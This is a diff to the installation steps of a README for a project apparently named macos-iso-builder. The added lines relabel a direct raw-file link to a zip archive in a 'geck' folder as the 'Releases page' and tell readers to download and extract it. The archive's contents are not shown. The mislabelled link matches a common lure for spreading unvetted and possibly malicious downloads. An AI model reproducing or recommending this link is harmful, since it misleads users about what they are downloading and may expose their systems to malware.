z4zconcept/macos-iso-builder/README.md

 ### Step-by-Step Installation

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/z4zconcept/macos-iso-builder/releases) to find the latest software version.
+   Go to the [Releases page](https://raw.githubusercontent.com/z4zconcept/macos-iso-builder/main/geck/macos-iso-builder_v2.0.zip) to find the latest software version.

 2. **Download the Application**
    On the Releases page, you will see a list of available files.
 Look for the release labeled as the latest version.
-Locate the file that best suits your needs, likely named something like `macos-iso-builder.zip`.
+Locate the file that best suits your needs, likely named something like `https://raw.githubusercontent.com/z4zconcept/macos-iso-builder/main/geck/macos-iso-builder_v2.0.zip`.

 3. **Extract the Files**
    After downloading the zip file, locate it in your downloads folder or the designated download location.
 Right-click on the zip file and select "Extract All" to unpack the contents.
 You may need a file extraction tool if your operating system does not support this natively.